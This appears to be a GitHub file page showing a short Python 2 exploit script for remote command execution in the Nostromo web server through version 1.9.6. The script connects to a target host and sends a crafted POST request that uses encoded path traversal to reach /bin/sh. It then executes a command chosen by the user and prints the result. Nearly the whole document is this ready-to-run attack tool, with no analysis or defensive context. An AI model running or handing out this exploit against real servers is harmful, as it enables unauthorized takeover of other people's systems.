Skip to content
Permalink
Branch: master
Find file Copy path
Find file Copy path
1 contributor

Users who have contributed to this file

executable file 33 lines (29 sloc) 849 Bytes
#!/usr/bin/env python
import socket
import argparse
parser = argparse.ArgumentParser(description='RCE in Nostromo web server through 1.9.6 due to path traversal.')
parser.add_argument('host',help='domain/IP of the Nostromo web server')
parser.add_argument('port',help='port number',type=int)
parser.add_argument('cmd',help='command to execute, default is id',default='id',nargs='?')
args = parser.parse_args()
def recv(s):
r=''
try:
while True:
t=s.recv(1024)
if len(t)==0:
break
r+=t
except:
pass
return r
def exploit(host,port,cmd):
s=socket.socket()
s.settimeout(1)
s.connect((host,int(port)))
payload="""POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0\r\nContent-Length: 1\r\n\r\necho\necho\n{} 2>&1""".format(cmd)
s.send(payload)
r=recv(s)
r=r[r.index('\r\n\r\n')+4:]
print r
exploit(args.host,args.port,args.cmd)
You can’t perform that action at this time.